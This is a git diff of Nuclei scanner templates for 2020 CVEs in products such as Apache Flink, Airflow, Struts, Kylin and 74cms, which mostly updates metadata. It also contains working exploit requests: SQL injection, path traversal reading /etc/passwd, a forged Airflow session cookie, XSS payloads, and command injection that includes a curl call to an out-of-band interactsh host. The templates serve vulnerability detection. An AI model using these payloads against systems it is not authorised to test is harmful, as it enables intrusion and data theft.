/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 Host: {{Hostname}} Accept: */* - - | GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1 Host: {{Hostname}} Accept: */* cookie-reuse: true + matchers-condition: and matchers: - type: word + part: body words: - "array(2)" - "Position: ||whoami||" - "root" condition: and - part: body - type: status status: - 200 diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index a485ca6b0c..67aa99a35b 100644 --- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -14,11 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17506 cwe-id: CWE-89 - cpe: cpe:2.3:a:articatech:web_proxy:*:*:*:*:*:*:*:* - epss-score: 0.96704 - tags: cve,cve2020,artica,proxy,packetstorm + epss-score: 0.96186 + cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: articatech + product: web_proxy + tags: cve,cve2020,artica,proxy,packetstorm http: - method: GET @@ -27,12 +29,18 @@ http: host-redirects: true max-redirects: 1 + matchers-condition: and matchers: - type: word words: - "artica-applianc" + - type: word + part: header + words: + - "PHPSESSID" + - type: status status: - 200 @@ -40,11 +48,6 @@ http: - 302 condition: or - - type: word - part: header - words: - - "PHPSESSID" - extractors: - type: kval kval: diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml index 36d01f797a..1e802257f5 100644 --- a/http/cves/2020/CVE-2020-17518.yaml +++ b/http/cves/2020/CVE-2020-17518.yaml @@ -16,13 +16,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2020-17518 - cwe-id: CWE-22 + cwe-id: CWE-22,CWE-23 + epss-score: 0.97469 cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* - epss-score: 0.97462 - tags: lfi,flink,fileupload,vulhub,cve,cve2020,apache,intrusive metadata: max-request: 2 - + vendor: apache + product: flink + tags: lfi,flink,fileupload,vulhub,cve,cve2020,apache,intrusive http: - raw: @@ -37,11 +38,10 @@ http: {{randstr}} ------WebKitFormBoundaryoZ8meKnrrso89R6Y-- - - | GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1 matchers: - type: dsl dsl: - - 'contains(body_2, "{{randstr}}") && status_code == 200' # Using CVE-2020-17519 to confirm this. + - 'contains(body_2, "{{randstr}}") && status_code == 200' diff --git a/http/cves/2020/CVE-2020-17519.yaml b/http/cves/2020/CVE-2020-17519.yaml index b8661c6b98..1fd45c10fb 100644 --- a/http/cves/2020/CVE-2020-17519.yaml +++ b/http/cves/2020/CVE-2020-17519.yaml @@ -16,22 +16,26 @@ info: cvss-score: 7.5 cve-id: CVE-2020-17519 cwe-id: CWE-552 + epss-score: 0.97434 cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* - epss-score: 0.97486 - tags: cve,cve2020,apache,lfi,flink metadata: max-request: 1 + vendor: apache + product: flink + tags: cve,cve2020,apache,lfi,flink http: - method: GET path: - "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd" + matchers-condition: and matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status status: - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index 1732bb95ca..83271c2100 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -11,18 +11,21 @@ info: - https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E - http://www.openwall.com/lists/oss-security/2020/12/21/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-17526 + - https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E remediation: Change default value for [webserver] secret_key config. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2020-17526 cwe-id: CWE-287 + epss-score: 0.03799 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* - epss-score: 0.02043 metadata: max-request: 2 fofa-query: Apache Airflow verified: true + vendor: apache + product: airflow tags: cve,cve2020,apache,airflow,auth-bypass http: @@ -30,15 +33,21 @@ http: - | GET /admin/ HTTP/1.1 Host: {{Hostname}} - - | GET /admin/ HTTP/1.1 Host: {{Hostname}} Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY req-condition: true + matchers-condition: and matchers: + - type: dsl + dsl: + - "contains(body_1, 'Redirecting...')" + - "status_code_1 == 302" + condition: and + - type: word part: body_2 words: @@ -48,9 +57,3 @@ http: - "SLA Misses" - "Task Instances" condition: and - - - type: dsl - dsl: - - "contains(body_1, 'Redirecting...')" - - "status_code_1 == 302" - condition: and diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index 92ab1541f4..537683e9c5 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -16,10 +16,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17530 cwe-id: CWE-917 - epss-score: 0.96825 - tags: cve,cve2020,apache,rce,struts,kev,packetstorm + epss-score: 0.971 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve,cve2020,apache,rce,struts,kev,packetstorm http: - method: GET @@ -29,6 +32,6 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index 605a6aa756..d1d10e58fb 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-18268 cwe-id: CWE-601 - cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* epss-score: 0.00138 - tags: cve,cve2020,redirect,zblogphp,authenticated + cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: zblogcn + product: z-blogphp + tags: cve,cve2020,redirect,zblogphp,authenticated http: - raw: @@ -30,7 +32,6 @@ http: Connection: close btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0 - - | GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2 Host: {{Hostname}} diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index 9c3d861669..d80fd6e69d 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-19282 cwe-id: CWE-79 - cpe: cpe:2.3:a:jeesns:jeesns:*:*:*:*:*:*:*:* - epss-score: 0.00165 - tags: cve,cve2020,jeesns,xss + epss-score: 0.00135 + cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jeesns + product: jeesns + tags: cve,cve2020,jeesns,xss http: - method: GET @@ -27,17 +29,16 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index 590bb56ae8..a0918ee82b 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-19283 cwe-id: CWE-79 - cpe: cpe:2.3:a:jeesns:jeesns:*:*:*:*:*:*:*:* - epss-score: 0.00165 - tags: cve,cve2020,jeesns,xss + epss-score: 0.00135 + cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jeesns + product: jeesns + tags: cve,cve2020,jeesns,xss http: - method: GET @@ -27,17 +29,16 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "" - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index 09e4453812..44c946d382 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-19295 cwe-id: CWE-79 - cpe: cpe:2.3:a:jeesns:jeesns:*:*:*:*:*:*:*:* epss-score: 0.00116 - tags: cve,cve2020,jeesns,xss + cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jeesns + product: jeesns + tags: cve,cve2020,jeesns,xss http: - method: GET @@ -27,17 +29,16 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index a6db8934c1..ea54afe274 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -14,11 +14,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-19360 - cpe: cpe:2.3:a:fhem:fhem:*:*:*:*:*:*:*:* + cwe-id: CWE-22 epss-score: 0.08443 - tags: fhem,lfi,cve,cve2020 + cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fhem + product: fhem + tags: fhem,lfi,cve,cve2020 http: - method: GET diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index 1c9c3448ee..20fafdd20d 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -16,11 +16,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-1943 cwe-id: CWE-79 + epss-score: 0.9737 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* - epss-score: 0.97275 - tags: cve,cve2020,apache,xss,ofbiz metadata: max-request: 1 + vendor: apache + product: ofbiz + tags: cve,cve2020,apache,xss,ofbiz http: - method: GET @@ -30,14 +32,14 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word + part: header words: - "text/html" - part: header - type: status status: diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index ea298337d2..e81e531373 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -11,14 +11,18 @@ info: - http://qdpm.net/download-qdpm-free-project-management - https://nvd.nist.gov/vuln/detail/CVE-2020-19515 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-19515 cwe-id: CWE-79 + epss-score: 0.00102 + cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:762074255 verified: true + vendor: qdpm + product: qdpm tags: cve,cve2020,xss,qdpm,unauth http: diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index eef5f49fdf..c1fae974e4 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -11,19 +11,21 @@ info: - https://community.sonarsource.com/t/apache-kylin-3-0-1-command-injection-vulnerability/25706 - https://nvd.nist.gov/vuln/detail/CVE-2020-1956 - http://www.openwall.com/lists/oss-security/2020/07/14/1 + - https://lists.apache.org/thread.html/r021baf9d8d4ae41e8c8332c167c4fa96c91b5086563d9be55d2d7acf@%3Ccommits.kylin.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-1956 cwe-id: CWE-78 - epss-score: 0.97262 + epss-score: 0.97423 cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true shodan-query: http.favicon.hash:-186961397 + vendor: apache + product: kylin tags: cve,cve2020,apache,kylin,rce,oast,kev - variables: username: "{{username}}:" password: "{{password}}" @@ -34,13 +36,13 @@ http: POST /kylin/api/user/authentication HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64('{{username}}:' + '{{password}}')}} - - | POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml index 1214096c30..61d67b1613 100644 --- a/http/cves/2020/CVE-2020-19625.yaml +++ b/http/cves/2020/CVE-2020-19625.yaml @@ -14,11 +14,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-19625 - cpe: cpe:2.3:a:gridx_project:gridx:*:*:*:*:*:*:*:* - epss-score: 0.87952 - tags: cve,cve2020,gridx,rce + epss-score: 0.88684 + cpe: cpe:2.3:a:gridx_project:gridx:1.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gridx_project + product: gridx + tags: cve,cve2020,gridx,rce http: - method: GET @@ -27,7 +29,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index d45a67f227..523d314086 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -14,12 +14,14 @@ info: cvss-score: 5.4 cve-id: CVE-2020-20285 cwe-id: CWE-79 - cpe: cpe:2.3:a:zzcms:zzcms:*:*:*:*:*:*:*:* epss-score: 0.0009 + cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: zzcms verified: true + vendor: zzcms + product: zzcms tags: cve,cve2020,zzcms,xss http: diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index 81f4372e39..2155967033 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -14,12 +14,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-20300 cwe-id: CWE-89 - cpe: cpe:2.3:a:weiphp:weiphp:*:*:*:*:*:*:*:* - epss-score: 0.14786 + epss-score: 0.26416 + cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"WeiPHP5.0" verified: true + vendor: weiphp + product: weiphp tags: weiphp,sql http: diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index cacd95d0cf..a9e00a1871 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -15,11 +15,13 @@ info: cvss-score: 8.8 cve-id: CVE-2020-2036 cwe-id: CWE-79 + epss-score: 0.0109 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* - epss-score: 0.01561 - tags: cve,cve2020,vpn,xss metadata: max-request: 2 + vendor: paloaltonetworks + product: pan-os + tags: cve,cve2020,vpn,xss http: - method: GET @@ -28,18 +30,19 @@ http: - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" stop-at-first-match: true + matchers-condition: and matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index dfe7c1c0c8..7735a620c9 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -15,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-2096 cwe-id: CWE-79 - cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:*:*:* - epss-score: 0.97056 + epss-score: 0.96767 + cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 shodan-query: http.title:"GitLab" + framework: jenkins + vendor: jenkins + product: gitlab_hook tags: jenkins,xss,gitlab,plugin,packetstorm,cve,cve2020 http: @@ -29,10 +32,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -42,3 +41,7 @@ http: part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index 0a7055ffa7..2a5a53c87f 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -13,11 +13,13 @@ info: cvss-score: 9.6 cve-id: CVE-2020-20982 cwe-id: CWE-79 - cpe: cpe:2.3:a:wdja:wdja_cms:*:*:*:*:*:*:*:* - epss-score: 0.01606 + epss-score: 0.03503 + cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:* metadata: max-request: 1 verified: true + vendor: wdja + product: wdja_cms tags: cve,cve2020,xss,wdja,shadoweb http: @@ -26,12 +28,13 @@ http: - "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" stop-at-first-match: true + matchers-condition: and matchers: - type: word - condition: and words: - "location.href='" + condition: and - type: word part: header diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index 8226405aa0..b3a3d7e1b8 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml @@ -14,11 +14,13 @@ info: cvss-score: 5.4 cve-id: CVE-2020-20988 cwe-id: CWE-79 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-score: 0.0009 + cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:* metadata: max-request: 2 verified: true + vendor: domainmod + product: domainmod tags: cve,cve2020,domainmod,xss,authenticated http: diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml index 34802bdf5a..f82503a729 100644 --- a/http/cves/2020/CVE-2020-21012.yaml +++ b/http/cves/2020/CVE-2020-21012.yaml @@ -15,11 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21012 cwe-id: CWE-89 - cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:*:*:*:*:*:*:*:* - epss-score: 0.02586 + epss-score: 0.10567 + cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:* metadata: max-request: 1 verified: true + vendor: hotel_and_lodge_booking_management_system_project + product: hotel_and_lodge_booking_management_system tags: cve,cve2020,hotel,sqli,unauth http: diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index e295a94ad8..7a2ae707b1 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -10,16 +10,19 @@ info: - https://jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 - http://www.openwall.com/lists/oss-security/2020/01/29/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-2103 + - https://access.redhat.com/errata/RHBA-2020:0402 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2020-2103 cwe-id: CWE-200 - cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:* - epss-score: 0.00535 + epss-score: 0.00534 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 2 shodan-query: http.favicon.hash:81586312 + vendor: jenkins + product: jenkins tags: cve,cve2020,jenkins http: @@ -27,26 +30,22 @@ http: - | GET {{BaseURL}}/whoAmI/ HTTP/1.1 Host: {{Hostname}} - - | GET {{BaseURL}}/whoAmI/ HTTP/1.1 Host: {{Hostname}} cookie-reuse: true req-condition: true + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: - 'text/html' - 'x-jenkins' - condition: and case-insensitive: true + condition: and - type: word part: body_2 @@ -55,6 +54,10 @@ http: - 'SessionId: null' condition: and + - type: status + status: + - 200 + extractors: - type: kval kval: diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index ae3ce7b63c..14905869fb 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -14,30 +14,32 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21224 cwe-id: CWE-88 - cpe: cpe:2.3:a:inspur:clusterengine:*:*:*:*:*:*:*:* - epss-score: 0.02686 - tags: cve,cve2020,clusterengine,rce + epss-score: 0.03 + cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: inspur + product: clusterengine + tags: cve,cve2020,clusterengine,rce http: - method: POST path: - "{{BaseURL}}/login" - headers: - Content-Type: application/x-www-form-urlencoded - Referer: "{{Hostname}}/module/login/login.html" body: | op=login&username=;`cat /etc/passwd`&password= + headers: + Content-Type: application/x-www-form-urlencoded + Referer: "{{Hostname}}/module/login/login.html" + matchers-condition: and matchers: - - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index da1cfbcd1e..2c3fad490f 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -15,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-2140 cwe-id: CWE-79 - cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:*:*:* - epss-score: 0.00155 - tags: cve,cve2020,jenkins,xss,plugin + epss-score: 0.00208 + cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:jenkins:*:* metadata: max-request: 2 + framework: jenkins + vendor: jenkins + product: audit_trail + tags: cve,cve2020,jenkins,xss,plugin http: - method: GET @@ -30,14 +33,14 @@ http: matchers-condition: and matchers: - type: word + part: body words: -

    sample - part: body - type: word + part: header words: - "text/html" - part: header - type: status status: diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index 6cac106b1d..512a4ab04f 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -12,16 +12,17 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2020-22210 + cve-id: CVE-2020-22208 cwe-id: CWE-89 - cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* - epss-score: 0.12933 + epss-score: 0.10555 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="74cms" shodan-query: http.html:"74cms" + vendor: 74cms + product: 74cms tags: cve,cve2020,74cms,sqli - variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index c5f1ab72c3..6e20c473fa 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -12,16 +12,17 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2020-22210 + cve-id: CVE-2020-22209 cwe-id: CWE-89 - cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* - epss-score: 0.12933 + epss-score: 0.10555 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="74cms" shodan-query: http.html:"74cms" + vendor: 74cms + product: 74cms tags: cve,cve2020,74cms,sqli - variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 13603148ca..4a847b0444 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -14,14 +14,15 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22210 cwe-id: CWE-89 - cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* - epss-score: 0.12933 + epss-score: 0.10555 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="74cms" shodan-query: http.html:"74cms" + vendor: 74cms + product: 74cms tags: cve,cve2020,74cms,sqli - variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index 25618d9dd0..6900bf5e8f 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -12,16 +12,17 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2020-22210 + cve-id: CVE-2020-22211 cwe-id: CWE-89 - cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* - epss-score: 0.12933 + epss-score: 0.10555 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="74cms" shodan-query: http.html:"74cms" + vendor: 74cms + product: 74cms tags: cve,cve2020,74cms,sqli - variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index 8e56f3926d..6f01ab0006 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml @@ -15,11 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-22840 cwe-id: CWE-601 + epss-score: 0.01174 cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:* - epss-score: 0.00649 - tags: packetstorm,edb,cve,cve2020,redirect,b2evolution metadata: max-request: 1 + vendor: b2evolution + product: b2evolution + tags: packetstorm,edb,cve,cve2020,redirect,b2evolution http: - method: GET @@ -28,6 +30,6 @@ http: matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' - part: header diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index 209e43f67f..d6a269c18b 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -13,15 +13,16 @@ info: cvss-score: 6.1 cve-id: CVE-2020-23015 cwe-id: CWE-601 - cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* epss-score: 0.00228 - tags: cve,cve2020,redirect,opnsense + cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: opnsense + product: opnsense + tags: cve,cve2020,redirect,opnsense http: - method: GET - path: - '{{BaseURL}}/?url=http://interact.sh' diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index c126f169e3..d1d3e3a122 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -13,13 +13,15 @@ info: cvss-score: 6.1 cve-id: CVE-2020-23517 cwe-id: CWE-79 - cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* epss-score: 0.00118 + cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true shodan-query: title:"HighMail" fofa-query: title="HighMail" + vendor: 